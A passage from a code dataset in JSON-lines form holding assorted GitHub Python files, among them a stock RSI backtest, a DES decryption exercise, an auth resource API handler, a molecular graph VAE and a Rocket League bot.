\"z\"])\n return activity\n\n\ndef setup_raw_data(url: str, path_to_data: str, file_name: str = \"RawData\"):\n if os.path.isdir(path_to_data):\n if os.path.isfile(f\"{path_to_data}/{file_name}\"):\n logging.info(\"Found the correct data.\")\n return\n else:\n logging.info(\n \"Data folder found, but it does not contain the right data. Downloading...\"\n )\n else:\n logging.info(\"Data folder not found. Downloading...\")\n print(\"Data not found. Downloading...\")\n\n os.makedirs(path_to_data, exist_ok=True)\n # Download raw data\n output_file = url.split(\"/\")[-1]\n output_file_path = os.path.join(path_to_data, output_file)\n download_raw_data(url, output_file_path)\n # Unzip raw data\n if zipfile.is_zipfile(output_file_path):\n with zipfile.ZipFile(output_file_path, \"r\") as zip_ref:\n zip_ref.extractall(path_to_data)\n\n # Check if all files are present\n req_files = [file_name]\n logging.info(\"Checking if all files are present...\")\n found_files = [_dir for _dir in os.listdir(path_to_data) if _dir in req_files]\n if len(found_files) == len(req_files):\n logging.info(\"All files are present\")\n # Remove zip file\n if zipfile.is_zipfile(output_file_path):\n os.remove(output_file_path)\n else:\n raise FileNotFoundError(\n \"Something went wrong. Please extract the zip file manually. \"\n f\"Your '{path_to_data}'-folder should contain the following files: {req_files}\"\n )\n\n\ndef main():\n return ()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JaNoNi/MADS-MMS-Exam2","sub_path":"helper_functions/data_manipulation.py","file_name":"data_manipulation.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32961150109","text":"# -- coding: utf-8 --\n# @Time : 2022/3/5 19:29\n# @Author : zhuo.wang\n# @File : sub_ris.py\nimport datetime\nimport os\nfrom multiprocessing import Pool\nimport warnings\nwarnings.filterwarnings('ignore')\nimport pandas as pd\n\nfrom tqdm import tqdm\nimport talib as ta\n\ninterval = 5\nmin_slope = 0.58\nmin_rsi_value = 42\nwidth = 30 / 50 * 60\nmin_rsi_window = 30\n\nclass Trading:\n\n def __init__(self,money=90000):\n self.money = money\n self.local_money = money\n self.end_date = None\n self.use_day = 0\n\n @classmethod\n def add_rsi(self,data):\n for freq in [6, 12, 24]:\n data[f\"rsi_{freq}\"] = ta.RSI(data.close, freq)\n return data\n\n def get_slope(self,data):\n return ((data - data.shift(-interval)) / width).shift(interval).iloc[-1]\n\n def get_next_p_change(self,item,date, n=1):\n n = n + 1\n s = item.loc[date:].iloc[n]\n self.end_date = s.date\n return s.p_change / 100\n\n def get_next_date(self,item,date, n=1):\n return item.loc[date:].iloc[n].date\n\n def sub_money(self,buy_money, p_change):\n buy_money *= (1 + p_change)\n buy_money += self.local_money * (1 / 3)\n self.money -= self.local_money * (1 / 3)\n return buy_money\n\n def get_min_difference(self,data, tolerance):\n max_reduce = data.max()\n current_value = data.iloc[-1]\n if current_value >= max_reduce * tolerance:\n return True\n return False\n\n def double_sell(self,item,buy_money, date, n=3):\n profit = buy_money * 0.5\n buy_money -= profit\n profit += buy_money * (1 + self.get_next_p_change(item,date, n))\n self.money += profit\n\n def get_min_rsi(self,data):\n min_rsi = data.min()\n current_value = data.iloc[-1]\n return (current_value - min_rsi) / current_value <= 0.10 and current_value < 38\n\n def get_profit(self,date,item,symbol):\n self.use_day = 0\n self.end_date = date\n buy_money = self.money * (1 / 3)\n self.money -= buy_money\n p_change = self.get_next_p_change(item, date, 1)\n\n if p_change > 0:\n buy_money *= (1 + p_change)\n # self.double_sell(item, buy_money, date, n=2)\n\n buy_money *= (1 + self.get_next_p_change(item,date,n=2))\n self.money += buy_money\n\n self.use_day += 2\n else:\n buy_money = self.sub_money(buy_money, p_change)\n p_change = self.get_next_p_change(item, date, 2)\n self.use_day += 1\n if p_change > 0:\n buy_money *= (1 + p_change)\n self.double_sell(item, buy_money, date, n=3)\n self.use_day += 2\n else:\n buy_money = self.sub_money(buy_money, p_change)\n buy_money *= (1 + self.get_next_p_change(item, date, n=3))\n self.double_sell(item, buy_money, date, n=4)\n self.use_day += 2\n profit = self.money - self.local_money\n ratio = profit / buy_money\n self.money = self.local_money\n return [symbol,date, profit,ratio,buy_money,self.use_day, self.end_date]\n\n @classmethod\n def load_stock(cls):\n file_path = os.path.join(BASE_DIR, 'results', f'{datetime.datetime.now().date()}_sub_rsi_stock_data.pkl')\n if os.path.exists(file_path):\n return pd.read_pickle(file_path)\n df = load_df()\n df = df.groupby('symbol').apply(lambda x: Trading.add_rsi(x)).reset_index(drop=True)\n stock = df[['name', 'date', 'ts_code', 'symbol', 'open', 'close', 'high', 'low', 'rsi_6', 'rsi_12', 'rsi_24',\n 'p_change']]\n stock = stock.groupby('symbol').apply(lambda x: x.assign(reduce=x['rsi_24'] - x['rsi_6'])).reset_index(\n drop=True)\n stock.to_pickle(file_path)\n return stock\n\n @classmethod\n def save(cls,result,latest_result):\n total = pd.DataFrame(result, columns=['symbol', 'date', 'profit','ratio','buy_money','use_day', 'end_date'])\n total.to_pickle(os.path.join(BASE_DIR, 'results', 'sub_ris.pkl'))\n if latest_result:\n pd.DataFrame(latest_result, columns=['symbol', 'date']).to_pickle(\n os.path.join(BASE_DIR, 'results', 'sub_rsi_latest.pkl'))\n print(total)\n print(total.profit.mean())\n\n def run(self,symbol,item,min_rsi):\n item.dropna(subset=['reduce'], inplace=True)\n item.set_index('date', inplace=True, drop=False)\n item['max_diff_60'] = item.reduce.rolling(window=60).apply(self.get_min_difference, args=(1,))\n item['max_diff_45'] = item.reduce.rolling(window=45).apply(self.get_min_difference, args=(1,))\n item['max_diff_30'] = item.reduce.rolling(window=30).apply(self.get_min_difference, args=(1,))\n item['is_min_rsi'] = item.rsi_6.rolling(window=min_rsi_window).apply(self.get_min_rsi)\n item['max_reduce'] = (item['max_diff_60'] + item['max_diff_45'] + item['max_diff_30']) >= 2\n item['slope'] = self.get_slope(item.rsi_6)\n profits = []\n latest_list = []\n condition = (item.max_reduce)\n if min_rsi:\n condition &= (item.is_min_rsi)\n for date in item.loc[condition,'date']:\n # if self.get_slope(item.loc[item.date<=date,'rsi_6']) >= min_slope:\n # continue\n if item.loc[item.date==date,'rsi_6'].iloc[0] > min_rsi_value:\n continue\n if date == item.date.max():\n latest_list.append([symbol,date])\n if profits and date <= profits[-1][-1]:\n continue\n try:\n profits.append(self.get_profit(date,item,symbol))\n except IndexError:\n self.money = self.local_money\n continue\n\n return profits,latest_list\n\n\nif __name__ == '__main__':\n from common.utils import load_df, BASE_DIR\n stock = Trading.load_stock()\n t = tqdm(range(len(stock.symbol.unique())), ncols=80)\n pool = Pool(4)\n jobs = []\n result = []\n latest_result = []\n min_rsi = False\n for symbol,item in stock.groupby('symbol'):\n # for symbol, item in stock.query(\"symbol=='300393.SZ'\").groupby('symbol'):\n obj = Trading(money=90000)\n jobs.append(pool.apply_async(obj.run,args=(symbol,item,min_rsi)))\n for job in jobs:\n winner,latest_list = job.get()\n if winner:\n result.extend(winner)\n latest_result.extend(latest_list)\n t.update(1)\n Trading.save(result,latest_result)\n","repo_name":"tosmart01/stock","sub_path":"models/sub_rsi.py","file_name":"sub_rsi.py","file_ext":"py","file_size_in_byte":6537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"44768598449","text":"import json\r\nwith open(r'./static/2018.json', \"r\", encoding=\"utf-8\") as f:\r\n json_data = json.load(f)\r\n list1= []\r\n new_key = \"log\"\r\n a = \"lon\"\r\n b = \"O3\"\r\n C = \"F\"\r\n new = \"size\"\r\n for i in json_data:\r\n i[new_key] = i.pop(a)\r\n i[new] = i.pop(b)\r\n i.pop(\"PM2.5\")\r\n i.pop(\"PM10\")\r\n i.pop(\"SO2\")\r\n i.pop(\"NO2\")\r\n i.pop(\"CO\")\r\n #i.pop(\"O3\")\r\n i[\"group\"] = C\r\n i.pop(\"RH\")\r\n i.pop(\"TEMP\")\r\n i.pop(\"PSFC\")\r\n i.pop(\"year\")\r\n list1.append(i)\r\nwith open(r'./China1.json', \"w\", encoding=\"UTF-8\") as e:\r\n json_new_data = json.dumps(list1, ensure_ascii=False, indent=4)\r\n e.write(json_new_data)\r\n\r\n print(json_new_data)","repo_name":"ColinZzc/AirPollutionVis","sub_path":"ChinaVisProject/dealwithjson.py","file_name":"dealwithjson.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5026099836","text":"import base64\r\nfrom Crypto.Cipher import DES\r\nfrom Crypto.Util.Padding import pad, unpad\r\ndef decrypt (ciphertext, key):\r\n cipher = DES.new(key, DES.MODE_ECB)\r\n plaintext = cipher.decrypt(ciphertext)\r\n #plaintext = unpad(plaintext, DES.block_size)\r\n return plaintext\r\n\r\n\r\nciphertext_b64 = \"6MupHn98v/yhX3jSCMf+LFOVQc7iRLALzTjd5ow34a5vnoPkSmZ1MHG/wU9Elkva\"\r\nciphertext_byte = base64.b64decode(ciphertext_b64)\r\nprint(ciphertext_byte)\r\n\r\nkey_hex = \"E001E001F101F101\"\r\nkey_b = bytes.fromhex(key_hex)\r\nprint(key_b)\r\nplaintext = decrypt(ciphertext_byte, key_b)\r\nprint(\"Decrypted plaintext:\", plaintext.decode('utf-8'))\r\n","repo_name":"minendie/Lab6_NT219","sub_path":"des.py","file_name":"des.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30430161321","text":"from __future__ import division\nfrom __future__ import print_function\nimport numpy\n\nt_size = 5\nf_size = t_size\nr_size = t_size\nc_size = t_size\ndata3d = numpy.arange(f_size * r_size * c_size, dtype=int).reshape(\n f_size, r_size, c_size\n)\n#\n# print data3d\n# for f in range(f_size):\n# for r in range(r_size):\n# for c in range(c_size):\n# print 'data3d[', f, ',', r, ',', c, '] =', data3d[f, r, c]\n#\ndata = []\ncont = 0\nfor f in range(f_size):\n for r in range(r_size):\n for c in range(c_size):\n data.append((f, r, c, cont**2))\n cont += 1\n\nprint(\"data =\", data)\n# f_tot = 0.0\n# r_tot = 0.0\n# c_tot = 0.0\n# d_tot = 0.0\n#\ncont = 0\nfor f, r, c, d in data:\n print(cont)\n # print 'data3d[', f, ',', r, ',', c, '] =', data[f, r, c]\n print(f, c, r, d)\n cont += 1\n# f_tot += d * f\n# r_tot += d * r\n# c_tot += d * c\n# d_tot += d\n\n# for f in range(f_size):\n# for r in range(r_size):\n# for c in range(c_size):\n# data3d.append((f, r, c, 0))\n\n\n# for f, r, c, d in data3d:\n# print 'data3d[', f, ',', r, ',', c, '] =', d\n","repo_name":"dials/dials_scratch","sub_path":"luiso_s/test_code/tst_loops.py","file_name":"tst_loops.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35624032080","text":"from typing import ValuesView\nfrom utils.day_base import DayBase\nfrom utils.data_input import input_generator\n\n\nclass Run_2021_04(DayBase):\n YEAR = \"2021\"\n DAY = \"04\"\n\n\nclass Board:\n # assume square\n board_size = 5\n\n def __init__(self, lines):\n self.entries = []\n self.col_hit = []\n self.row_hit = []\n self.unhit_total = 0\n self.done = False\n for line in lines:\n words = line.split()\n entry = []\n for word in words:\n val = int(word)\n entry.append(val)\n self.unhit_total += val\n self.entries.append(entry)\n self.col_hit.append(0)\n self.row_hit.append(0)\n\n def call(self, N):\n \"\"\" Returns (hit, score)\"\"\"\n if self.done:\n # Don't continue once won: needed for part B\n return (False, 0)\n for col in range(0, Board.board_size):\n for row in range(0, Board.board_size):\n if self.entries[col][row] == N:\n self.col_hit[col] += 1\n self.row_hit[row] += 1\n self.unhit_total -= N\n if (\n self.col_hit[col] == Board.board_size\n or self.row_hit[row] == Board.board_size\n ):\n self.done = True\n return (True, self.unhit_total * N)\n return (False, 0)\n\n\ndef part_a(input, part_b=False):\n generator = input_generator(input)\n numbers = next(generator)\n _ = next(generator) # blank\n boards = []\n lines = []\n for line in generator:\n lines.append(line)\n if len(lines) == 5:\n boards.append(Board(lines))\n lines = []\n # No blank line at end\n try:\n _ = next(generator) # blank\n except StopIteration:\n break\n words = numbers.split(\",\")\n boards_done = 0\n for word in words:\n N = int(word)\n for board in boards:\n (result, score) = board.call(N)\n if result:\n boards_done += 1\n if part_b == False:\n if boards_done == 1:\n return score\n else:\n if boards_done == len(boards):\n return score\n assert 0, \"no bingo\"\n\n\ndef part_b(input):\n return part_a(input, True)\n\n\nif __name__ == \"__main__\":\n Run_2021_04().run_cmdline()\n","repo_name":"colinroybell/aoc-py","sub_path":"src/aoc2021/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30977288563","text":"import logging\nimport re\n\nimport aiohttp.web\nimport asab\nimport asab.web.rest\n\nfrom seacatauth.decorators import access_control\n\n#\n\nL = logging.getLogger(__name__)\n\n#\n\n\nclass ResourceHandler(object):\n\t\"\"\"\n\tResource management\n\n\t---\n\ttags: [\"Resource management\"]\n\t\"\"\"\n\n\tdef __init__(self, app, rbac_svc):\n\t\tself.RBACService = rbac_svc\n\t\tself.ResourceService = app.get_service(\"seacatauth.ResourceService\")\n\n\t\tweb_app = app.WebContainer.WebApp\n\t\tweb_app.router.add_get(\"/resource\", self.list)\n\t\tweb_app.router.add_get(\"/resource/{resource_id}\", self.get)\n\t\tweb_app.router.add_post(\"/resource/{resource_id}\", self.create_or_undelete)\n\t\tweb_app.router.add_put(\"/resource/{resource_id}\", self.update)\n\t\tweb_app.router.add_delete(\"/resource/{resource_id}\", self.delete)\n\n\n\t@access_control(\"seacat:resource:access\")\n\tasync def list(self, request):\n\t\t\"\"\"\n\t\tList resources\n\n\t\t---\n\t\tparameters:\n\t\t-\tname: p\n\t\t\tin: query\n\t\t\tdescription: Page number\n\t\t\tschema:\n\t\t\t\ttype: integer\n\t\t-\tname: i\n\t\t\tin: query\n\t\t\tdescription: Items per page\n\t\t\tschema:\n\t\t\t\ttype: integer\n\t\t-\tname: f\n\t\t\tin: query\n\t\t\tdescription: Filter string\n\t\t\tschema:\n\t\t\t\ttype: string\n\t\t-\tname: exclude\n\t\t\tin: query\n\t\t\tdescription:\n\t\t\t\tExclude resources based on their type/status. If omitted, this parameter defaults\n\t\t\t\tto `exclude=deleted`, which means the results include all active resources.\n\t\t\trequired: false\n\t\t\texplode: false\n\t\t\tschema:\n\t\t\t\ttype: array\n\t\t\t\titems:\n\t\t\t\t\tenum: [\"active\", \"deleted\", \"globalonly\"]\n\t\t\"\"\"\n\t\tpage = int(request.query.get(\"p\", 1)) - 1\n\t\tlimit = request.query.get(\"i\", None)\n\t\tif limit is not None:\n\t\t\tlimit = int(limit)\n\n\t\t# Filter by ID.startswith()\n\t\tquery_filter = {}\n\t\tif \"f\" in request.query:\n\t\t\tquery_filter[\"_id\"] = {\"$regex\": \"^{}\".format(re.escape(request.query[\"f\"]))}\n\n\t\t# Get the types of resources to exclude from the results\n\t\t# By default, exclude only deleted resources\n\t\texclude = request.query.get(\"exclude\", \"\")\n\t\tif len(exclude) == 0:\n\t\t\texclude = \"deleted\"\n\t\texclude = exclude.split(\",\")\n\t\tif \"deleted\" in exclude:\n\t\t\tif \"active\" in exclude:\n\t\t\t\treturn asab.web.rest.json_response(request, {\"data\": [], \"count\": 0})\n\t\t\telse:\n\t\t\t\tquery_filter[\"deleted\"] = {\"$in\": [None, False]}\n\t\telse:\n\t\t\tif \"active\" in exclude:\n\t\t\t\tquery_filter[\"deleted\"] = True\n\t\t\telse:\n\t\t\t\tpass\n\n\t\tif \"globalonly\" in exclude:\n\t\t\tif \"_id\" not in query_filter:\n\t\t\t\tquery_filter[\"_id\"] = {}\n\t\t\tquery_filter[\"_id\"][\"$nin\"] = list(self.ResourceService.GlobalOnlyResources)\n\n\t\tresources = await self.ResourceService.list(page, limit, query_filter)\n\t\treturn asab.web.rest.json_response(request, resources)\n\n\n\t@access_control(\"seacat:resource:access\")\n\tasync def get(self, request):\n\t\t\"\"\"\n\t\tGet resource detail\n\t\t\"\"\"\n\t\tresource_id = request.match_info[\"resource_id\"]\n\t\tresult = await self.ResourceService.get(resource_id)\n\t\treturn asab.web.rest.json_response(\n\t\t\trequest, result\n\t\t)\n\n\n\t@asab.web.rest.json_schema_handler({\n\t\t\"type\": \"object\",\n\t\t\"additionalProperties\": False,\n\t\t\"properties\": {\n\t\t\t\"description\": {\"type\": \"string\"}}\n\t})\n\t@access_control(\"seacat:resource:edit\")\n\tasync def create_or_undelete(self, request, *, json_data):\n\t\t\"\"\"\n\t\tCreate a new resource or undelete a resource that has been soft-deleted\n\t\t\"\"\"\n\t\tresource_id = request.match_info[\"resource_id\"]\n\n\t\ttry:\n\t\t\tresource = await self.ResourceService.get(resource_id)\n\t\t\t# Resource exists: can it be undeleted?\n\t\t\tif resource.get(\"deleted\") in [None, False]:\n\t\t\t\traise asab.exceptions.Conflict(\"Resource already exists.\", key=\"_id\", value=resource_id)\n\t\t\tundelete = True\n\t\texcept KeyError:\n\t\t\tundelete = False\n\n\t\tif undelete:\n\t\t\tawait self.ResourceService.undelete(resource_id)\n\t\telse:\n\t\t\tawait self.ResourceService.create(resource_id, json_data.get(\"description\"))\n\t\treturn asab.web.rest.json_response(request, {\"result\": \"OK\"})\n\n\n\t@asab.web.rest.json_schema_handler({\n\t\t\"type\": \"object\",\n\t\t\"additionalProperties\": False,\n\t\t\"properties\": {\n\t\t\t\"name\": {\"type\": \"string\"},\n\t\t\t\"description\": {\"type\": \"string\"},\n\t\t}\n\t})\n\t@access_control(\"seacat:resource:edit\")\n\tasync def update(self, request, *, json_data):\n\t\t\"\"\"\n\t\tUpdate resource description or rename resource\n\t\t\"\"\"\n\t\tresource_id = request.match_info[\"resource_id\"]\n\t\tif \"description\" in json_data:\n\t\t\tawait self.ResourceService.update(resource_id, json_data[\"description\"])\n\t\tif \"name\" in json_data and json_data[\"name\"] != resource_id:\n\t\t\t# TODO: Renaming should be on a separate endpoint\n\t\t\tawait self.ResourceService.rename(resource_id, json_data[\"name\"])\n\n\t\treturn asab.web.rest.json_response(request, {\"result\": \"OK\"})\n\n\n\t@access_control(\"seacat:resource:edit\")\n\tasync def delete(self, request, *, credentials_id):\n\t\t\"\"\"\n\t\tDelete resource\n\n\t\tThe resource is soft-deleted (suspended) by default.\n\n\t\t---\n\t\tparameters:\n\t\t-\tname: hard_delete\n\t\t\tin: query\n\t\t\tdescription:\n\t\t\t\tBy default, the resource is only soft-deleted, i.e. marked as deleted and retained in te database.\n\t\t\t\tEnabling this switch causes the resource to be completely removed from the database.\n\t\t\t\tHard-deleting requires `authz:superuser`.\n\t\t\trequired: false\n\t\t\tschema:\n\t\t\t\ttype: boolean\n\t\t\t\tenum: [\"true\"]\n\t\t\"\"\"\n\t\tresource_id = request.match_info[\"resource_id\"]\n\t\thard_delete = request.query.get(\"hard_delete\") == \"true\"\n\t\tif hard_delete and not request.is_superuser:\n\t\t\tL.log(asab.LOG_NOTICE, \"Cannot hard-delete resources without superuser rights\", struct_data={\n\t\t\t\t\"cid\": credentials_id, \"resource\": resource_id})\n\t\t\treturn aiohttp.web.HTTPForbidden()\n\t\tawait self.ResourceService.delete(resource_id, hard_delete=hard_delete)\n\t\treturn asab.web.rest.json_response(request, {\"result\": \"OK\"})\n","repo_name":"TeskaLabs/seacat-auth","sub_path":"seacatauth/authz/resource/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"8199726872","text":"import torch\nimport torch.nn as nn\nfrom ggpm.encoder import HierMPNEncoder\nfrom ggpm.decoder import HierMPNDecoder\nfrom ggpm.nnutils import *\n\n\ndef make_cuda(tensors):\n tree_tensors, graph_tensors = tensors\n make_tensor = lambda x: x if type(x) is torch.Tensor else torch.tensor(x)\n tree_tensors = [to_cuda(make_tensor(x)).long() for x in tree_tensors[:-1]] + [tree_tensors[-1]]\n graph_tensors = [to_cuda(make_tensor(x)).long() for x in graph_tensors[:-1]] + [graph_tensors[-1]]\n return tree_tensors, graph_tensors\n\nclass HierVAE(nn.Module):\n def __init__(self, args):\n super(HierVAE, self).__init__()\n self.encoder = HierMPNEncoder(args.vocab, args.atom_vocab, args.rnn_type, args.embed_size, args.hidden_size,\n args.depthT, args.depthG, args.dropout)\n self.decoder = HierMPNDecoder(args.vocab, args.atom_vocab, args.rnn_type, args.embed_size, args.hidden_size,\n args.latent_size, args.diterT, args.diterG, args.dropout)\n self.encoder.tie_embedding(self.decoder.hmpn)\n self.latent_size = args.latent_size\n\n self.R_mean = nn.Linear(args.hidden_size, args.latent_size)\n self.R_var = nn.Linear(args.hidden_size, args.latent_size)\n\n # self.T_mean = nn.Linear(args.hidden_size, args.latent_size)\n # self.T_var = nn.Linear(args.hidden_size, args.latent_size)\n\n # self.G_mean = nn.Linear(args.hidden_size, args.latent_size)\n # self.G_var = nn.Linear(args.hidden_size, args.latent_size)\n\n def rsample(self, z_vecs, W_mean, W_var, perturb=True):\n batch_size = z_vecs.size(0)\n z_mean = W_mean(z_vecs)\n z_log_var = -torch.abs(W_var(z_vecs))\n kl_loss = -0.5 * torch.sum(1.0 + z_log_var - z_mean * z_mean - torch.exp(z_log_var)) / batch_size\n epsilon = to_cuda(torch.randn_like(z_mean))\n z_vecs = z_mean + torch.exp(z_log_var / 2) * epsilon if perturb else z_mean\n return z_vecs, kl_loss\n\n def sample(self, batch_size):\n root_vecs = to_cuda(torch.randn(batch_size, self.latent_size))\n return self.decoder.decode((root_vecs, root_vecs, root_vecs), greedy=True, max_decode_step=150)\n\n def reconstruct(self, batch):\n mols, graphs, tensors, _, _, _ = batch\n tree_tensors, graph_tensors = tensors = make_cuda(tensors)\n root_vecs, tree_vecs, _, graph_vecs = self.encoder(tree_tensors, graph_tensors)\n\n root_vecs, root_kl = self.rsample(root_vecs, self.R_mean, self.R_var, perturb=False)\n return self.decoder.decode((root_vecs, root_vecs, root_vecs), greedy=True, max_decode_step=150)\n\n def forward(self, mols, graphs, tensors, orders, homos, lumos, beta, perturb_z=True):\n tree_tensors, graph_tensors = tensors = make_cuda(tensors)\n\n root_vecs, tree_vecs, _, graph_vecs = self.encoder(tree_tensors, graph_tensors)\n\n # graph_vecs = stack_pad_tensor( [graph_vecs[st : st + le] for st,le in graph_tensors[-1]] )\n # size = graph_vecs.new_tensor([le for _,le in graph_tensors[-1]])\n # graph_vecs = graph_vecs.sum(dim=1) / size.unsqueeze(-1)\n\n # tree_vecs = stack_pad_tensor( [tree_vecs[st : st + le] for st,le in tree_tensors[-1]] )\n # size = tree_vecs.new_tensor([le for _,le in tree_tensors[-1]])\n # tree_vecs = tree_vecs.sum(dim=1) / size.unsqueeze(-1)\n\n root_vecs, root_kl = self.rsample(root_vecs, self.R_mean, self.R_var, perturb_z)\n # tree_vecs, tree_kl = self.rsample(tree_vecs, self.T_mean, self.T_var, perturb_z)\n # graph_vecs, graph_kl = self.rsample(graph_vecs, self.G_mean, self.G_var, perturb_z)\n kl_div = root_kl # + tree_kl + graph_kl\n\n # modify molecules\n loss, wacc, iacc, tacc, sacc = self.decoder((root_vecs, root_vecs, root_vecs), graphs, tensors, orders)\n\n return loss + beta * kl_div, kl_div.item(), wacc, iacc, tacc, sacc","repo_name":"quocdat32461997/ggpm","sub_path":"ggpm/hpgnn.py","file_name":"hpgnn.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73392295574","text":"import math\n\nfrom rlbot.agents.base_agent import BaseAgent, SimpleControllerState\nfrom rlbot.utils.structures.game_data_struct import GameTickPacket\nfrom rlbot.agents.base_agent import SimpleControllerState\n\nfrom objects import *\nfrom states import *\nfrom util import *\nfrom mlp import brain\n\nimport pygame\nimport pickle\n\n\"\"\"\nRogue Neurons by GooseFairy/ddthj\nPrepared for Professor Stansbury, CS455 and the RLBot community\n\nrogue.py - main file for the bot\n\n\"\"\"\n\n\n\ndef savee(data): #takes any serializable object and writes it into data.dat\n pickle.dump(data, open(\"data.dat\",\"wb\"))\n print(\"saved\")\n \nclass gui: #the gui used when the bot is creating training data\n def __init__(self):\n pygame.init()\n pygame.font.init()\n self.font = pygame.font.SysFont('uh',30)\n self.window = pygame.display.set_mode((500,500))\n self.white = (255,255,255)\n self.cur = 2\n \n def update(self,agent): #returns the current state given by the user & updates the window\n self.window.fill(self.white)\n if self.cur == 1:\n msg = \"shoot\"\n elif self.cur == 2:\n msg = \"contest\"\n elif self.cur == 3:\n msg = \"clear\"\n elif self.cur == 4:\n msg = \"retreat\"\n elif self.cur == 5:\n msg = \"recover\"\n text = self.font.render(msg, False, (0,0,0))\n self.window.blit(text, (250,250))\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_q:\n self.cur = 2\n return 2 #contest\n elif event.key == pygame.K_w:\n self.cur = 1\n return 1 #shoot\n elif event.key == pygame.K_e:\n self.cur = 3\n return 3 #clear\n elif event.key == pygame.K_r:\n self.cur = 4\n return 4 #retreat\n elif event.key == pygame.K_t:\n self.cur = 5\n return 5 #recover\n elif event.key == pygame.K_p:\n agent.save()\n return self.cur\n\nclass rogue(BaseAgent): #the bot\n def initialize_agent(self): #called by the RLBot Framework automatically after it __init__'s\n\n #objects to hold game information\n self.me = carObject(self.index) \n self.enemy = carObject(not self.index)\n self.ball = ballObject()\n \n #states of our bot\n self.states = [atba(), shoot(), contest(), clear(), retreat(), recover()]\n self.state = self.states[2]\n\n #controller that will be returned to the framework\n self.c = SimpleControllerState()\n\n #Determines what model to use. 0=hardcoded, 1=training mode, 2=play from model\n #Currently configured to play a match with Keras model vs human-made conditional model\n if self.team == 1: \n self.brain = 2 \n else:\n self.brain = 0\n\n #inits components as required\n if self.brain == 1:\n self.gui = gui()\n if self.brain == 2:\n self.model = brain()\n \n #keeps track of match time and time since last jump\n self.time = 0\n self.sinceJump = 9.9\n\n #this is where training data is managed\n self.active = False\n self.sinceSave = 0\n self.trainData = []\n \n def refresh(self): #re-init's our controller to reset all of it's values to defaults\n self.c.__init__()\n return self.c\n\n def save(self): #saves training data\n savee(self.trainData)\n\n def check_state(agent):#this is where the selected model chooses which state the bot (agent) will execute\n\n #the features\n my_time = cap((agent.me.location - agent.ball.location).magnitude() / cap((agent.ball.location - agent.me.location).normalize().dot(agent.me.velocity - agent.ball.velocity), 0.01, 6000),0.01, min(10, (agent.me.location-agent.ball.location).magnitude()/1050))\n enemy_time = cap((agent.enemy.location - agent.ball.location).magnitude() / cap((agent.ball.location - agent.enemy.location).normalize().dot(agent.enemy.velocity - agent.ball.velocity), 0.01, 6000),0.01,min(10, (agent.enemy.location-agent.ball.location).magnitude()/1050))\n my_defense = math.pi - math.acos((agent.ball.location - agent.me.location).normalize().dot((agent.ball.location - Vector3(0,5100*side(agent.team),0)).normalize()))\n enemy_defense = math.pi - math.acos((agent.ball.location - agent.enemy.location).normalize().dot((agent.ball.location - Vector3(0,5100*side(not agent.team),0)).normalize()))\n my_offense = math.pi - math.acos((agent.ball.location - agent.me.location).normalize().dot((Vector3(0,5100*-side(agent.team),0)-agent.ball.location).normalize()))\n enemy_offense = math.pi - math.acos((agent.ball.location - agent.enemy.location).normalize().dot((Vector3(0,5100*-side(not agent.team),0)-agent.ball.location).normalize()))\n ball_ready = True if agent.ball.location[2] < 150 and abs(agent.ball.velocity[2]) < 100 else False\n\n #conditional model \n if agent.brain == 0:\n if agent.me.airborn and agent.sinceJump > 1.4:\n agent.state = agent.states[5] #recover\n elif ((my_time + 0.4 <= enemy_time or enemy_offense < 2.0) and my_offense > 0.75) and ball_ready == True:\n agent.state = agent.states[1] #shoot\n elif ((my_time - 1.0 <= enemy_time) or (enemy_offense < 1.57)) and my_offense > 1.57:\n agent.state = agent.states[2] #contest\n elif (my_offense < 1.57 and enemy_offense > 1.0) and abs(agent.ball.location[0]) < 2000:\n agent.state = agent.states[3] #clear\n else:\n agent.state = agent.states[4] #retreat/collect boost\n #training model\n elif agent.brain == 1:\n temp = agent.gui.update(agent)\n agent.state = agent.states[temp]\n if agent.active == True and agent.sinceSave >= 5: #only samples once every 5 frames\n agent.sinceSave = 0\n #all the sample data is divided by its maximum value so that they all land between 0 and 1\n pack = [my_time/10, enemy_time/10, my_defense/3.14, enemy_defense/3.14, my_offense/3.14, enemy_offense/3.14, int(ball_ready),int(agent.me.airborn),temp]\n agent.trainData.append(pack)\n #keras model\n else:\n pack = [my_time/10, enemy_time/10, my_defense/3.14, enemy_defense/3.14, my_offense/3.14, enemy_offense/3.14, int(ball_ready),int(agent.me.airborn)]\n agent.state = agent.states[agent.model.get_state(pack)]\n agent.sinceSave += 1\n \n def get_output(self, packet: GameTickPacket) -> SimpleControllerState: #called by RLBot Framework every tick\n self.process(packet)\n self.check_state()\n return self.state.execute(self)\n\n def process(self,packet): #converts packet information into our internal objects for ease-of-use\n self.sinceJump += packet.game_info.seconds_elapsed-self.time\n self.time = packet.game_info.seconds_elapsed\n self.active = packet.game_info.is_round_active or packet.game_info.is_kickoff_pause\n self.ball.update(packet.game_ball)\n self.me.update(packet.game_cars[self.index])\n self.enemy.update(packet.game_cars[not self.index])\n","repo_name":"ddthj/Rogue-Neurons","sub_path":"rogue.py","file_name":"rogue.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"36496197329","text":"from __future__ import with_statement\n\ntry:\n from setuptools import setup\n extra_options = {\n 'entry_points': {\n 'console_scripts': 